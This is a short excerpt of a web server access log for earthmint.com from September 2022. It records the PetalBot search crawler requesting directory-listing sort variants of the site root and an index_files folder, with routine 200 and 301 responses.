114.119.144.212 - - [06/Sep/2022:11:28:11 -0700] "GET /index_files/?S=A HTTP/1.1" 200 314 "https://www.earthmint.com/index_files?M=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
114.119.144.229 - - [06/Sep/2022:11:33:09 -0700] "GET /index_files/?C=M%3BO%3DA HTTP/1.1" 200 314 "https://www.earthmint.com/index_files/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
114.119.144.229 - - [06/Sep/2022:11:38:07 -0700] "GET /?C=N%3BO%3DD HTTP/1.1" 200 379 "https://earthmint.com?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.144.229 - - [06/Sep/2022:11:48:08 -0700] "GET /index_files?D=D HTTP/1.1" 301 1419 "https://www.earthmint.com/index_files?D=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
114.119.144.229 - - [06/Sep/2022:11:48:09 -0700] "GET /index_files/?D=D HTTP/1.1" 200 314 "https://www.earthmint.com/index_files?D=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
114.119.144.209 - - [06/Sep/2022:11:53:09 -0700] "GET /index_files?M=A HTTP/1.1" 301 1419 "https://www.earthmint.com/index_files?M=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
114.119.144.209 - - [06/Sep/2022:11:53:12 -0700] "GET /index_files/?M=A HTTP/1.1" 200 314 "https://www.earthmint.com/index_files?M=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
